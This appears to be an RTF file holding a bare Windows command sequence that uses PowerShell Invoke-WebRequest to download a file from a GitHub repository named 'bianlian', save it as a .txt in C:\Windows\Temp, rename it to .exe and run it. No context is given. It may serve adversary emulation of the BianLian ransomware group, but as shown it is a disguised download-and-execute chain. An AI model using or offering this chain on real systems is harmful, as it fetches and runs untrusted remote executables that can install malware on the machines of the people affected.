{\rtf1\ansi\ansicpg1252\cocoartf2761
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\froman\fcharset0 Times-Roman;\f1\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red82\green72\blue255;\red83\green83\blue83;\red0\green0\blue0;
\red169\green81\blue83;\red169\green101\blue233;}
{\*\expandedcolortbl;;\cssrgb\c40000\c40000\c100000;\cssrgb\c40000\c40000\c40000;\cssrgb\c0\c0\c0;
\cssrgb\c72549\c40000\c40000;\cssrgb\c72549\c50196\c93333;}
\paperw11900\paperh16840\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs24 \cf2 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Powershell.exe Invoke-WebRequest\cf3 \strokec3  \cf0 \strokec4 \'91https://github.com/keithmcintyre/bianlian/blob/main/file1.txt?raw=true\'92\cf5 \strokec5  \cf6 \strokec6 -OutFile C:\\Windows\\Temp\\file1.txt\cf0 \strokec4 \
ren \cf6 \strokec6 C:\\Windows\\Temp\\file1.txt\cf0 \strokec4  file1.exe\

\f1\fs26 cd C:\\Windows\\Temp
\f0\fs24 \
./file1.exe\
}